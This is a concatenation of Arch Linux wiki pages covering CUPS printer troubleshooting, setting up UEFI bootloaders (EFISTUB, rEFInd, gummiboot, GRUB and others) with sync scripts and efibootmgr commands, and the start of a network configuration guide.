# error: Unable to communicate with device (code=12): hp:/usb/<printer id><br />
or, "{{ic|Unable to communicate with device"}}", then it may be needed to [[Groups#Group management|add the user to the lp and sys groups]].<br />
<br />
This can also be caused by printers such as the P1102 that provide a virtual cd-rom drive for MS-Windows drivers. The lp dev appears and then disappears. In that case try the '''usb-modeswitch''' and '''usb-modeswitch-data''' packages, that lets one switch off the "Smart Drive" (udev rules included in said packages).<br />
<br />
This can also occur with network attached printers if the [[Avahi|avahi-daemon]] is not running.<br />
<br />
====CUPS returns '"foomatic-rip" not available/stopped with status 3' with a HP printer====<br />
If receiving any of the following error messages in {{ic|/var/log/cups/error_log}} while using a HP printer, with jobs appearing to be processed while they all end up not being completed with their status set to 'stopped':<br />
Filter "foomatic-rip" for printer "<printer_name>" not available: No such file or director<br />
or:<br />
PID 5771 (/usr/lib/cups/filter/foomatic-rip) stopped with status 3!<br />
make sure {{pkg|hplip}} has been [[pacman|installed]], in addition to [[#Packages|the packages mentioned above]]. See [https://bbs.archlinux.org/viewtopic.php?id=65615 this forum post] for more information.<br />
<br />
====Printing fails with unauthorised error====<br />
If the user has been added to the lp group, and allowed to print (set in {{ic|cupsd.conf}}), then the problem lies in {{ic|/etc/cups/printers.conf}}. This line could be the culprit:<br />
AuthInfoRequired negotiate<br />
<br />
Comment it out and restart CUPS.<br />
<br />
====Print button greyed-out in GNOME print dialogs====<br />
:''<small>Source: [https://bbs.archlinux.org/viewtopic.php?id=70418 I can't print from gnome applications. - Arch Forums]</small>''<br />
<br />
Be sure the package: '''libgnomeprint''' is installed<br />
<br />
Edit {{ic|/etc/cups/cupsd.conf}} and add<br />
# HostNameLookups Double<br />
<br />
Restart CUPS:<br />
# systemctl restart cups<br />
<br />
====Unknown supported format: application/postscript====<br />
Comment the lines:<br />
application/octet-stream application/vnd.cups-raw 0 -<br />
from {{ic|/etc/cups/mime.convs}}, and:<br />
application/octet-stream<br />
in {{ic|/etc/cups/mime.types}}.<br />
<br />
====Finding URIs for Windows Print Servers====<br />
<br />
Sometimes Windows is a little less than forthcoming about exact device URIs (device locations). If having trouble specifying the correct device location in CUPS, run the following command to list all shares available to a certain windows username:<br />
$ smbtree -U ''windowsusername''<br />
This will list every share available to a certain Windows username on the local area network subnet, as long as Samba is set up and running properly. It should return something like this:<br />
{{bc| WORKGROUP<br />
\\REGULATOR-PC <br />
\\REGULATOR-PC\Z <br />
\\REGULATOR-PC\Public <br />
\\REGULATOR-PC\print$ Printer Drivers<br />
\\REGULATOR-PC\G <br />
\\REGULATOR-PC\EPSON Stylus CX8400 Series EPSON Stylus CX8400 Series}}<br />
What is needed here is first part of the last line, the resource matching the printer description. So to print to the EPSON Stylus printer, one would enter:<br />
smb://username.password@REGULATOR-PC/EPSON Stylus CX8400 Series<br />
as the URI into CUPS. Notice that whitespaces are allowed in URIs, whereas backslashes get replaced with forward slashes.<br />
If it won't work try '%20' instead of spaces.<br />
<br />
====Print-Job client-error-document-format-not-supported====<br />
Try installing the foomatic packages and use a foomatic driver.<br />
<br />
====/usr/lib/cups/backend/hp failed====<br />
Change<br />
SystemGroup sys root<br />
to<br />
SystemGroup lp root<br />
in {{ic|/etc/cups/cupsd.conf}}<br />
<br />
<br />
Following steps 1-3 in the Alternative CUPS interfaces below may be a better solution, since newer versions of cups will not allow the same group for both normal and admin operation.<br />
<br />
==== Unable to get list of printer drivers ====<br />
* Check your ServerName in /etc/cups/client.conf is written without http://<br />
ServerName localhost:631<br />
* Try to remove Foomatic drivers.<br />
<br />
====lp: Error - Scheduler Not Responding====<br />
If you get this error when printing a document using:<br />
<br />
$ lp document-to-print<br />
<br />
Try setting the CUPS_SERVER environment variable:<br />
<br />
$ export CUPS_SERVER=localhost<br />
<br />
If this solves your problem, make the solution permanent by adding the export line above to ~/.bash_profile.<br />
<br />
====CUPS prints only an empty and an error-message page on HP LaserJet====<br />
<br />
There is a bug that causes CUPS to fail when printing images on HP LaserJet (in my case 3380). The bug has been reported and fixed by [https://bugs.launchpad.net/ubuntu/+source/cups-filters/+bug/998087 Ubuntu].<br />
The first page is empty, the second page contains the following error message:<br />
ERROR:<br />
invalidaccess<br />
OFFENDING COMMAND:<br />
filter<br />
STACK:<br />
/SubFileDecode<br />
endstream<br />
...<br />
<br />
In order to fix the issue, use the following command (as superuser):<br />
lpadmin -p <printer> -o pdftops-renderer-default=pdftops<br />
<br />
===="Using invalid Host" error message====<br />
<br />
Try to add "ServerAlias *" into cupsd.conf<br />
<br />
====Printer doesn't print with an "Filter failed" message on CUPS web interface (HP printer)====<br />
<br />
Change the permissions of the printer USB port:<br />
<br />
Get the bus and device number from lsusb, then set the permission using:<br />
<br />
{{ic|chmod 0666 /dev/bus/usb/<bus number>/<device number>}}<br />
<br />
To make the persistent permission change that will be triggered automatically each time the computer is rebooted, add the following line.<br />
<br />
{{hc|/etc/udev/rules.d/10-local.rules|<nowiki>SUBSYSTEM=="usb", ATTRS{idVendor}=="Printer_idVendor", ATTRS{idProduct}=="Printer_idProduct", GROUP="lp", MODE:="666"</nowiki>}}<br />
<br />
Obtain the right information by using {{ic|lsusb}} command, and don't forget to substitute {{ic|Printer_idVendor}} & {{ic|Printer_idProduct}} with the relevant ones.<br />
<br />
Each system may vary, so consult [[udev#List_attributes_of_a_device]] wiki page.<br />
<br />
====HPLIP 3.13: Plugin is installed, but HP Device Manager complains it is not====<br />
<br />
The issue might have to do with the file permission change that had been made to {{ic|/var/lib/hp/hplip.state}}. To correct the issue, a simple {{ic|chmod 644 /var/lib/hp/hplip.state}} and {{ic|chmod 755 /var/lib/hp}} should be sufficient. For further information, please read this [https://bugs.launchpad.net/hplip/+bug/1131596 link].<br />
<br />
====Printer is not recognized by CUPS====<br />
<br />
If your printer is not listed in the "Add Printers" page of the CUPS web interface, nor by lpinfo -v, try the following (suggested in [https://bbs.archlinux.org/viewtopic.php?pid=1037279#p1037279 this thread]):<br />
<br />
# Remove {{ic|usblp}} from blacklist<br />
# Load {{ic|usblp}} module<br />
modprobe usblp<br />
# Stop cups (sudo systemctl stop cups)<br />
# Add the following udev rule in the following new rule /etc/udev/rules.d/10-cups_device_link.rules<br />
KERNEL=="lp[0-9]", SYMLINK+="%k", GROUP="lp"<br />
# Reload udev rules<br />
sudo udevadm control --reload-rules<br />
# Unplug and re-plug the printer <br />
# Wait a few seconds and then start cups again (sudo systemctl start cups)<br />
<br />
==See also==<br />
* [http://localhost:631/documentation.html Official CUPS documentation], ''locally installed''<br />
* [http://www.cups.org/ Official CUPS Website]<br />
* [http://www.linuxprinting.org/ Linux Printing], ''[http://www.linuxfoundation.org The Linux Foundation]''<br />
* [http://www.gentoo.org/doc/en/printing-howto.xml Gentoo's Printing Guide], ''[http://www.gentoo.org/doc/en Gentoo Documentation Resources]''<br />
* [https://bbs.archlinux.org/ Arch Linux User Forums]<br />
* [http://wiki.gotux.net/tutorials/software/hp-printer Install HP Printers Easy Way]</div>Wakehttps://wiki.archlinux.org/index.php?title=UEFI_Bootloaders&diff=250273UEFI Bootloaders2013-03-11T20:09:09Z<p>Wake: /* Setting up EFISTUB */ added '<'</p>
<hr />
<div>[[Category:Boot loaders]]<br />
[[zh-CN:UEFI Bootloaders]]<br />
This page contains info about various [[UEFI]] Bootloaders capable of booting Linux kernel. It is recommended to read the [[UEFI]] and [[GPT]] pages before reading this page. The following [[Boot Loader|bootloaders]] (listed in decreasing order of stability) are explained here:<br />
<br />
== Linux Kernel EFISTUB ==<br />
<br />
Linux (Kernel >= 3.3) supports {{ic|EFISTUB (EFI BOOT STUB)}} booting. It is enabled by by default on Arch Linux kernels or can be activated by setting {{ic|CONFIG_EFI_STUB&#61;y}} in the Kernel configuration (see [https://git.kernel.org/?p=linux/kernel/git/torvalds/linux.git;a=blob_plain;f=Documentation/x86/efi-stub.txt;hb=HEAD The EFI Boot Stub] for more information).<br />
<br />
A single EFISTUB kernel is not capable of launching other kernels, hence each EFISTUB Kernel + Initramfs pair requires a separate boot menu entry. It is recommended to use a UEFI Boot Manager to manage multiple kernels.<br />
<br />
=== Setting up EFISTUB ===<br />
<br />
#[https://wiki.archlinux.org/index.php/Unified_Extensible_Firmware_Interface#Create_an_UEFI_System_Partition_in_Linux Create a FAT32 UEFI System Partition]<br />
# Mount the UEFI System Partition at {{ic|/boot/efi}} with {{ic|# mount <UEFI Partition> /boot/efi}}<br />
# Create {{ic|/boot/efi/EFI/arch/}} directory with {{ic|# mkdir /boot/efi/EFI/arch/}}<br />
# Copy the following files from source to destination<br />
{| border="1"<br />
!Boot File Source!!UEFI Destination<br />
|-<br />
| /boot/vmlinuz-linux || /boot/efi/EFI/arch/vmlinuz-arch.efi<br />
|-<br />
| /boot/initramfs-linux.img || /boot/efi/EFI/arch/initramfs-arch.img<br />
|-<br />
| /boot/initramfs-linux-fallback.img || /boot/efi/EFI/arch/initramfs-arch-fallback.img<br />
|}<br />
<br />
=== Sync EFISTUB Kernel ===<br />
{{Warning|The EFISTUB Kernel must be updated each time the kernel is updated (follow step 4 in [https://wiki.archlinux.org/index.php/UEFI_Bootloaders#Setting_up_EFISTUB Setting up EFISTUB]. Failure to do so will result in failure to boot. Alternatively one can automatically update the EFISTUB kernel using one of the following methods:}}<br />
<br />
{{Note| As of [https://www.archlinux.org/packages/extra/any/refind-efi/ refind-efi 0.6.5], refind now automatically detects kernels in {{ic|/boot}}. They do not have to be renamed to have a {{ic|.efi}} extension either. Hence, the following sync scripts aren't needed if using [https://wiki.archlinux.org/index.php/UEFI_Bootloaders#Using_rEFInd refind].}}<br />
<br />
==== Systemd ====<br />
[[Systemd]] features event triggered tasks. In this particular case, the ability to detect a change in path is used to sync the EFISTUB kernel and initramfs files when they are updated in {{ic|boot}}.<br />
<br />
<br />
{{Warning|Since mkinitcpio takes time to build the kernel stub and the initramfs. It is possible for the following systemd services to copy older kernel stubs and initramfs instead of the new ones. To reduce the chance of this error, it is better to bind the efistub copying service to check if the initramfs-linux-fallback.img was changed (since it is the last thing built by mkinitcpio).}}<br />
{{Tip|Save the following script as {{ic|/usr/lib/systemd/system/efistub-update.path}}}}<br />
{{bc|<nowiki><br />
[Unit]<br />
Description=Copy EFISTUB Kernel to UEFISYS Partition<br />
<br />
[Path]<br />
PathChanged=/boot/initramfs-linux-fallback.img<br />
<br />
[Install]<br />
WantedBy=multi-user.target<br />
</nowiki>}}<br />
<br />
{{Tip|Save the following script as {{ic|/usr/lib/systemd/system/efistub-update.service}}}}<br />
{{bc|<nowiki><br />
[Unit]<br />
Description=Copy EFISTUB Kernel to UEFISYS Partition<br />
<br />
[Service]<br />
Type=oneshot<br />
ExecStart=/bin/cp -f /boot/vmlinuz-linux /boot/efi/EFI/arch/vmlinuz-arch.efi<br />
ExecStart=/bin/cp -f /boot/initramfs-linux.img /boot/efi/EFI/arch/initramfs-arch.img<br />
ExecStart=/bin/cp -f /boot/initramfs-linux-fallback.img /boot/efi/EFI/arch/initramfs-arch-fallback.img<br />
</nowiki>}}<br />
<br />
{{Tip|Enable these services with<br />
{{bc|<nowiki><br />
# systemctl enable efistub-update.path<br />
</nowiki>}}}}<br />
<br />
==== Incron ====<br />
{{Pkg|incron}} can run a script to sync the EFISTUB Kernel after updates<br />
<br />
{{Tip|Save the following script as {{ic|/usr/local/bin/efistub-update.sh}}}}<br />
{{bc|<nowiki><br />
#!/bin/sh<br />
/bin/cp -f /boot/vmlinuz-linux /boot/efi/EFI/arch/vmlinuz-arch.efi<br />
/bin/cp -f /boot/initramfs-linux.img /boot/efi/EFI/arch/initramfs-arch.img<br />
/bin/cp -f /boot/initramfs-linux-fallback.img /boot/efi/EFI/arch/initramfs-arch-fallback.img<br />
</nowiki>}}<br />
<br />
{{Tip|Save the following script as {{ic|/etc/incron.d/efistub-update.conf}}}}<br />
{{Note|The first parameter {{ic|/boot/initramfs-linux-fallback.img}} is the file to watch. The second parameter {{ic|IN_CLOSE_WRITE}} is the action to watch for. The third parameter {{ic|/usr/local/bin/efistub-update.sh}} is the script to execute.}}<br />
{{bc|<nowiki><br />
/boot/initramfs-linux-fallback.img IN_CLOSE_WRITE /usr/local/bin/efistub-update.sh<br />
</nowiki>}}<br />
<br />
{{Tip|In order to use this method, incron must be activated, if it is not run<br />
{{bc|<nowiki><br />
# systemctl enable incrond.service<br />
</nowiki>}}}}<br />
<br />
==== Mkinitcpio hook ====<br />
Mkinitcpio can generate a hook that does not need a system level daemon to function. It spawns a background process which waits for the generation of {{ic|vm-linuz}}, {{ic|initramfs-linux.img}}, and {{ic|initramfs-linux-fallback.img}}; then follows step 4 in [https://wiki.archlinux.org/index.php/UEFI_Bootloaders#Setting_up_EFISTUB Setting up EFISTUB]<br />
<br />
{{Tip|Save the following script as {{ic|/usr/lib/initcpio/install/efistub-update}}}}<br />
{{bc|<nowiki><br />
#!/bin/sh<br />
<br />
build() {<br />
/root/watch.sh &<br />
}<br />
<br />
help() {<br />
cat <<HELPEOF<br />
This hook waits for mkinitcpio to finish and copies the finished ramdisk and kernel to the ESP<br />
HELPEOF<br />
}<br />
</nowiki>}}<br />
<br />
{{Tip|Save the following script as {{ic|/root/watch.sh}} and make it executable}}<br />
{{bc|<nowiki><br />
#!/bin/sh<br />
<br />
while [[ -d "/proc/$PPID" ]]; do<br />
sleep 1<br />
done<br />
<br />
/bin/cp -f /boot/vmlinuz-linux /boot/efi/EFI/arch/vmlinuz-arch.efi<br />
/bin/cp -f /boot/initramfs-linux.img /boot/efi/EFI/arch/initramfs-arch.img<br />
/bin/cp -f /boot/initramfs-linux-fallback.img /boot/efi/EFI/arch/initramfs-arch-fallback.img<br />
<br />
echo "Synced kernel with ESP"<br />
</nowiki>}}<br />
<br />
{{Tip|Add {{ic|efistub-update}} to the list of hooks in {{ic|/etc/mkinitcpio.conf}}}}<br />
<br />
=== Booting EFISTUB ===<br />
<br />
{{Warning|Linux Kernel EFISTUB booting uses {{ic|\}} instead of {{ic|/}} and should be relative to the UEFI System Partition's root. For example, if the initramfs is located in {{ic|/boot/efi/EFI/arch/initramfs-linux.img}}, the corresponding UEFI formatted line would be {{ic|\EFI\arch\initramfs-linux.img}}. Failure to convert the options will lead to a system hang without any error message from the firmware or kernel.}}<br />
<br />
One can boot the EFISTUB kernel using one of the following ways :<br />
<br />
==== Using rEFInd ====<br />
<br />
rEFInd is a fork of rEFIt Boot Manager (used in Intel Macs) by Rod Smith (author of GPT-fdisk). rEFInd fixes many issues in rEFIt with respect to non-Mac UEFI booting and also has support for booting EFISTUB kernels and contains some features specific to them. More info about rEFInd support for EFISTUB is at [http://www.rodsbooks.com/refind/linux.html The rEFInd Boot Manager: Methods of Booting Linux].<br />
<br />
# Install {{Pkg|refind-efi}} package with {{ic|# pacman -S refind-efi}}<br />
# Copy the following files from their source directory to their destination<br />
{{Note|1=<arch> is the bit architecture of the system. Run {{ic|$ uname -m}} to get the architecture. Replace <arch> with "ia32" for 32 bit systems, and <arch> with "x64" for 64 bit systems.}}<br />
{| border="1"<br />
!rEFInd File Source!!UEFI Destination<br />
|-<br />
| /usr/lib/refind/refind_<arch>.efi || /boot/efi/EFI/refind/refind_<arch>.efi<br />
|-<br />
| /usr/lib/refind/config/refind.conf || /boot/efi/EFI/refind/refind.conf<br />
|-<br />
| /usr/share/refind/icons || /boot/efi/EFI/refind/icons<br />
|}<br />
<br />
{{Tip|Refind's configuration file is located in {{ic|/boot/efi/EFI/refind/refind.conf}}. The file is well commented.}}<br />
<br />
{{Note|As of {{Pkg|refind-efi}} 0.6.5-1, refind can auto-detect kernels in {{ic|/boot}}, if there are UEFI drivers for the filesystem used by /boot partition (or / partition if no separate /boot is used) in the ESP, and are loaded by rEFInd. To enable rEFInd to detect and load the drivers and /boot kernels you must enable the appropriate options in {{ic|refind.conf}} (mainly mention the PATH for the drivers location in the ESP) and also copy your {{ic|refind_linux.conf}} to {{ic|/boot/refind_linux.conf}} .}}<br />
<br />
{{Tip|Pass kernel specific commands by copying {{ic|/usr/lib/refind/config/refind_linux.conf}} to {{ic|/boot/efi/EFI/arch/refind_linux.conf}}. This file should be located in the same directory as the EFISTUB kernel. Edit the configuration file to be similar to the template below. Replace the string after PARTUIID with your root's PARTUIID}}<br />
{{Note|Please notice the difference between the standard UUID and the PARTUUID shown by {{ic|$ ls -l /dev/disk/by-partuuid/}}}}<br />
{{hc|$esp/EFI/arch/refind_linux.conf|<nowiki><br />
"Boot with defaults" "root=PARTUUID=3518bb68-d01e-45c9-b973-0b5d918aae96 ro rootfstype=ext4 add_efi_memmap systemd.unit=graphical.target"<br />
"Boot to Terminal" "root=PARTUUID=3518bb68-d01e-45c9-b973-0b5d918aae96 ro rootfstype=ext4 add_efi_memmap systemd.unit=multi-user.target"</nowiki>}}<br />
<br />
{{Tip|Each line of {{ic|refind_linux.conf}} is displayed as a submenu by rEFInd. Access the submenu with "+" or "insert" keys.}}<br />
<br />
{{Tip|In non-Mac systems, create an entry for rEFInd using [[UEFI#efibootmgr|efibootmgr]] where sdX is the UEFI disk, and Y is the UEFI partition number. Run :<br />
{{bc|<nowiki><br />
# modprobe efivars<br />
# efibootmgr -c -g -d /dev/sdX -p Y -w -L "rEFInd" -l '\EFI\refind\refind_<arch>.efi'<br />
</nowiki>}}}}<br />
<br />
===== Systemd Automation =====<br />
{{Tip|To automate the process of copying refind files and updating the nvram (if needed) use the following script}}<br />
<br />
{{Note|Save this script as {{ic|/usr/lib/systemd/scripts/refind_name_patchv2}}}}<br />
{{Tip|If you want to change the directory that refind is installed in the UEFISYS partition, just change the value of $refind_dir in the script}}<br />
{{bc|<nowiki><br />
#!/bin/bash<br />
## COPYRIGHT 2013 : MARK E. LEE (BLUERIDER) : mlee24@binghamton.edu; mark@markelee.com<br />
<br />
## LOG<br />
## 1/17/2013 : Version 2 of refind_name_patch is released<br />
## : Supports long subdirectory location for refind<br />
## : Updates nvram when needed<br />
## : 10% speed boost<br />
<br />
function main () { ## main insertion function<br />
declare -r refind_dir="/boot/efi/EFI/refind"; ## set the refind directory<br />
declare -r arch=$(uname -m | awk -F'_' '{if ($1 == "x86"){print $2}}') && ## get bit architecture<br />
update-efi-dir; ## updates or creates the refind directory<br />
update-efi-nvram; ## updates nvram if needed<br />
}<br />
<br />
function update-efi-dir () { ## setup the refind directory<br />
if [ ! -d $refind_dir ]; then ## check if refind directory exists<br />
echo "Couldn't find $refind_dir";<br />
mkdir $refind_dir && ## make the refind directory if needed<br />
echo "Made $refind_dir";<br />
fi;<br />
if [ "$arch" ]; then ## check if anything was stored in $arch<br />
cp -r /usr/{share/refind/*,lib/refind/*$arch*} $refind_dir/ && ## update bin and dirs<br />
echo "Updated binaries and directory files for refind at $refind_dir";<br />
else<br />
echo "Failed to detect an x86 architecture";<br />
exit;<br />
fi;<br />
}<br />
<br />
function update-efi-nvram () { ## update the nvram with efibootmgr<br />
declare -r ref_bin=${refind_dir/\/boot\/efi}/$(ls /usr/lib | grep $arch*.efi); ## get path of refind binary (without /boot/efi)<br />
declare -r ref_bin_escape=${ref_bin//\//\\\\}; ## insert escape characters into $ref_bin<br />
modprobe efivars && ## grab the efi variables for efibootmgr<br />
efibootmgr -v | grep $ref_bin_escape && ( ## check if boot entry is in nvram<br />
echo "Found boot entry, no need to update nvram";<br />
) || ( ## if boot entry is not in nvram; add it<br />
declare -r esp=$(mount -l | awk '/ESP/ {print $1}') && ## get ESP partition<br />
efibootmgr -c -g -d ${esp:0:8} -p ${esp:8} -w -L "rEFInd" -l $ref_bin_escape && ## update nvram<br />
echo "<br />
Updated nvram with entry rEFInd to boot $ref_bin<br />
Did not copy configuration files, please move refind.conf to $refind_dir/";<br />
)<br />
}<br />
<br />
main; ## run the main insertion function<br />
</nowiki>}}<br />
<br />
{{Note|Save the following service file as {{ic|/usr/lib/systemd/system/refind_update.path}}}}<br />
{{bc|<nowiki><br />
[Unit]<br />
Description=Update rEFInd bootloader files<br />
<br />
[Path]<br />
PathChanged=/usr/lib/refind/refind_<arch>.efi<br />
Unit=refind_update.service<br />
<br />
[Install]<br />
WantedBy=multi-user.target<br />
</nowiki>}}<br />
<br />
{{Note|Save the following service file as {{ic|/usr/lib/systemd/system/refind_update.service}}}}<br />
{{bc|<nowiki><br />
[Unit]<br />
Description=Update rEFInd directories, binaries, and nvram<br />
<br />
[Service]<br />
Type=oneshot<br />
ExecStart=/bin/bash /usr/lib/systemd/scripts/refind_name_patchv2<br />
RemainAfterExit=no<br />
</nowiki>}}<br />
<br />
{{Tip|Enable the systemd path unit by running :<br />
{{bc|<nowiki><br />
# systemctl enable refind_update.path;<br />
</nowiki>}}}}<br />
<br />
===== Apple Macs =====<br />
<br />
In case of Apple Macs, try {{AUR|mactel-boot}} for an experimental "bless" utility for Linux. If that does not work, use "bless" form within OSX to set rEFInd as default bootloader. Assuming UEFISYS partition is mounted at {{ic|/mnt/efi}} within OSX, do<br />
<br />
$ sudo bless --setBoot --folder /mnt/efi/EFI/refind --file /mnt/efi/EFI/refind/refind_x64.efi<br />
<br />
===== VirtualBox =====<br />
<br />
In case of VirtualBox, see [[VirtualBox#Using_Arch_under_Virtualbox_EFI_mode]].<br />
<br />
==== Using gummiboot ====<br />
<br />
[[Gummiboot]] is a UEFI Boot Manager which provides a nice menu for EFISTUB Kernels. It is a new program and relatively untested compared to rEFInd . It is available in [extra] as {{Pkg|gummiboot}}. See http://freedesktop.org/wiki/Software/gummiboot for more info.<br />
<br />
==== Using UEFI Shell ====<br />
<br />
It is possible to launch EFISTUB kernel form UEFI Shell as if it is a normal UEFI application. In this case the kernel parameters are passed as normal parameters to the launched EFISTUB kernel file.<br />
<br />
> fs0:<br />
> cd \EFI\arch<br />
> vmlinuz-arch.efi root=PARTUUID=3518bb68-d01e-45c9-b973-0b5d918aae96 ro rootfstype=ext4 add_efi_memmap initrd=\EFI\arch\initramfs-arch.img<br />
<br />
You can also write a simple {{ic|archlinux.nsh}} file with your boot parameters and put it in your UEFI System Partition, then run it with:<br />
<br />
fs0:<br />
archlinux<br />
<br />
Example Script:<br />
<br />
echo -on<br />
\EFI\arch\vmlinuz-arch.efi root=PARTUUID=3518bb68-d01e-45c9-b973-0b5d918aae96 ro rootfstype=ext4 add_efi_memmap initrd=\EFI\arch\initramfs-arch.img<br />
<br />
This way you can specify UUID's without needing to remember the name or type out 20-30 characters.<br />
<br />
==== Using efibootmgr entry ====<br />
<br />
{{Note|1=This menthod may not work due to [https://git.kernel.org/?p=linux/kernel/git/mfleming/efi.git;a=commitdiff;h=b003aaf799c991295b8b73e8f940d20bda2c1bbb;hp=ddffeb8c4d0331609ef2581d84de4d763607bd37 limitations in how the kernel handles uefi runtime variables]. For example in Lenovo Thinkpads the initrd path is truncated (verified using {{ic|efibootmgr -v}} command) and therefore the kernel fails to boot.}}<br />
<br />
{{Note|Some UEFI firmwares may not support embedding command line parameters to uefi applications in the boot entries.}}<br />
<br />
It is possible to directly embed the kernel parameters within the boot entry created by efibootmgr. This means that in your BIOS/UEFI you will be able to select Arch Linux directly in the default boot order, and on startup it will boot into Arch directly without any kind of boot selection GUI.<br />
<br />
Do (as root):<br />
<br />
Install efibootmgr if you haven't already.<br />
# pacman -S --needed efibootmgr<br />
<br />
Determine the UUID or PARTUUID of your boot device (ie. the partition for {{ic|/}}, not the EFI boot partition)<br />
# blkid<br />
<br />
Load the EFI module.<br />
# modprobe efivars<br />
<br />
Finally, add the efistub.<br />
WARNING: Make sure you replace the following before running this command:<br />
* ''3518bb68-d01e-45c9-b973-0b5d918aae96'' -- with the UUID of your {{ic|/}} partition. (This is not PARTUUID!)<br />
* ''ext4'' -- if you use a different file system.<br />
* ''/dev/sda'' -- the drive that contains the EFI boot partition.<br />
* ''-p 1'' -- the partition number of the EFI boot partition.<br />
# echo 'root=UUID=3518bb68-d01e-45c9-b973-0b5d918aae96 ro rootfstype=ext4 add_efi_memmap initrd=\EFI\arch\initramfs-arch.img' | iconv -f ascii -t ucs2 | efibootmgr -c -g -d /dev/sda -p 1 -L "Arch Linux" -l '\EFI\arch\vmlinuz-arch.efi' -@ -<br />
<br />
or you can just run the following line (remember to replace /dev/sda1):<br />
<br />
# echo "root=UUID=$(blkid /dev/sda1 -o value -s UUID) ro rootfstype=ext4 add_efi_memmap initrd=\\EFI\\arch\\initramfs-arch.img" | iconv -f ascii -t ucs2 | efibootmgr -c -g -d /dev/sda -p 1 -L "Arch Linux" -l '\EFI\arch\vmlinuz-arch.efi' -@ -<br />
<br />
It is a good idea to run<br />
<br />
# efibootmgr -v<br />
<br />
to verify that the resulting entry is correct. You should also consider reordering the boot options ({{ic|efibootmgr -o}}) to place the Arch entry last, which will make the system easier to recover if it fails.<br />
{{Note|On at least one system, the {{ic|\\a}} in the initrd path was still interpreted as an escape character. If you get a "Failed to open initrd file" error or suspect that might be the case, try putting a triple backslash before the a in arch}}<br />
{{Note|The trailing hyphen after {{ic|--append-binary-args}} or {{ic|-@}} is required to instruct efibootmgr to read the parameters from STDIN (standard input). The code should be {{ic|--append-binary-args -}} or {{ic|-@ -}} .}}<br />
<br />
More info about efibootmgr at [[UEFI#efibootmgr]]. Forum post https://bbs.archlinux.org/viewtopic.php?pid=1090040#p1090040 .<br />
<br />
{{Note|Some firmwares may have trouble with the "initrd path" when piping in ucs-2 as shown above. In this case, one may put vmlinuz-linux.efi and the initramfs in the root of the ESP and adjust the efibootmgr entry accordingly.}}<br />
<br />
== GRUB 2.x ==<br />
<br />
GRUB 2.x contains its own filesystem drivers and does not rely on the firmware to access the files. It can directly read files from {{ic|/boot}} and does not require the kernel and initramfs files to be in the UEFISYS partition. Detailed information at [[GRUB#UEFI_systems_2]]. For bzr development version try AUR package - {{AUR|grub-efi-x86_64-bzr}}.<br />
<br />
== SYSLINUX ==<br />
<br />
{{Note|Syslinux UEFI support is currently part of version 6.00-preXX or in firmware branch of upstream git repo. It is considered alpha quality by upstream. The below information is provided mainly to enable bug-testing. Please report all issues upstream.}}<br />
<br />
{{Note|Syslinux UEFI can boot only those kernels that support '''EFI Handover Protocol'''. Thus LTS kernels are not supported.}}<br />
<br />
Install {{AUR|syslinux-efi-git}} AUR package and copy {{ic|/usr/lib/syslinux/efi64/*}} to {{ic|$esp/EFI/syslinux/}} ({{ic|$esp}} is the mountpoint of UEFISYS partition) ({{ic|efi64}} is for x86_64 UEFI firmwares, replace with {{ic|efi32}} for i386 UEFI firmwares), and then create a boot entry using efibootmgr in the firmware boot manager.<br />
<br />
== ELILO ==<br />
<br />
ELILO is the UEFI version of LILO Boot Loader. It was originally created for Intel Itanium systems which supported only EFI (precursor to UEFI). It is the oldest UEFI bootloader for Linux. It is still in development but happens at a very slow pace. Upstream provided compiled binaries are available at http://sourceforge.net/projects/elilo/ . Elilo config file {{ic|elilo.conf}} is similar to [[LILO]]'s config file. AUR package - {{AUR|elilo-efi-x86_64}} (only for x86_64 UEFI).<br />
<br />
== EFILINUX ==<br />
<br />
EFILINUX is a reference implementation of a UEFI Linux bootloader and precursor to Kenrel EFISTUB support. It is considered to be a alpha quality software (as on 16-MAY-2012). Upstream sources are at https://github.com/mfleming/efilinux . and the usage instructions are at http://thread.gmane.org/gmane.linux.kernel/1172645 and http://article.gmane.org/gmane.linux.kernel/1175060 . AUR packages - {{Pkg|efilinux-efi}} and {{AUR|efilinux-efi-x86_64-git}} (only for x86_64 UEFI).<br />
<br />
== Package Naming Guidelines ==<br />
<br />
UEFI bootloader package(s) should be suffixed with {{ic|-efi-x86_64}} or {{ic|-efi-i386}} to denote package built for 64-bit and 32-bit UEFI respectively. If a single package contains both 64-bit and 32-bit UEFI applications, then {{ic|-efi}} suffix should be used in the '''pkgname'''.<br />
<br />
== See also ==<br />
<br />
* [http://www.rodsbooks.com/efi-bootloaders/ Rod Smith - Managing EFI Boot Loaders for Linux]<br />
* [http://www.rodsbooks.com/refind/ Rod Smith - rEFInd, a fork or rEFIt]<br />
* [https://git.kernel.org/?p=linux/kernel/git/torvalds/linux.git;a=blob_plain;f=Documentation/x86/efi-stub.txt;hb=HEAD Linux Kernel Documentation on EFISTUB]<br />
* [http://git.kernel.org/?p=linux/kernel/git/torvalds/linux.git;a=commitdiff;h=291f36325f9f252bd76ef5f603995f37e453fc60;hp=55839d515495e766605d7aaabd9c2758370a8d27 Linux Kernel EFISTUB Git Commit]<br />
* [http://www.rodsbooks.com/efi-bootloaders/efistub.html Rod Smith's page on EFISTUB]<br />
* [http://www.rodsbooks.com/refind/linux.html rEFInd Documentation for booting EFISTUB Kernels]</div>Wakehttps://wiki.archlinux.org/index.php?title=Network_configuration&diff=250264Network configuration2013-03-11T18:16:19Z<p>Wake: /* No eth0 with Atheros AR8161 */ Package is now named compat-drives.</p>
<hr />
<div>[[Category:Networking]]<br />
[[Category:Getting and installing Arch]]<br />
[[cs:Configuring Network]]<br />
[[es:Configuring Network]]<br />
[[fr:Connexions reseau]]<br />
[[it:Configuring Network]]<br />
[[ja:Network Configuration]]<br />
[[nl:Configuring Network]]<br />
[[pt:Configuring Network]]<br />
[[ro:Configurare retea]]<br />
[[ru:Configuring Network]]<br />
[[sk:Configuring Network]]<br />
[[tr:Ağ_Yapılandırması]]<br />
[[zh-CN:Configuring Network]]<br />
{{Article summary start}}<br />
{{Article summary text|A simple guide for setting up and troubleshooting network.}}<br />
{{Article summary heading|Overview}}<br />
{{Article summary text|{{Networking overview}}}}<br />
{{Article summary heading|Related}}<br />
{{Article summary wiki|Jumbo Frames}}<br />
{{Article summary wiki|Firewalls}}<br />
{{Article summary wiki|Samba}}<br />
{{Article summary wiki|Wireless Setup}}<br />
{{Article summary end}}<br />
<br />
== Check the connection ==<br />
{{Note|If you receive an error like {{ic|ping: icmp open socket: Operation not permitted}} when executing ping, try to re-install the {{ic|iputils}} package.}} <br />
<br />
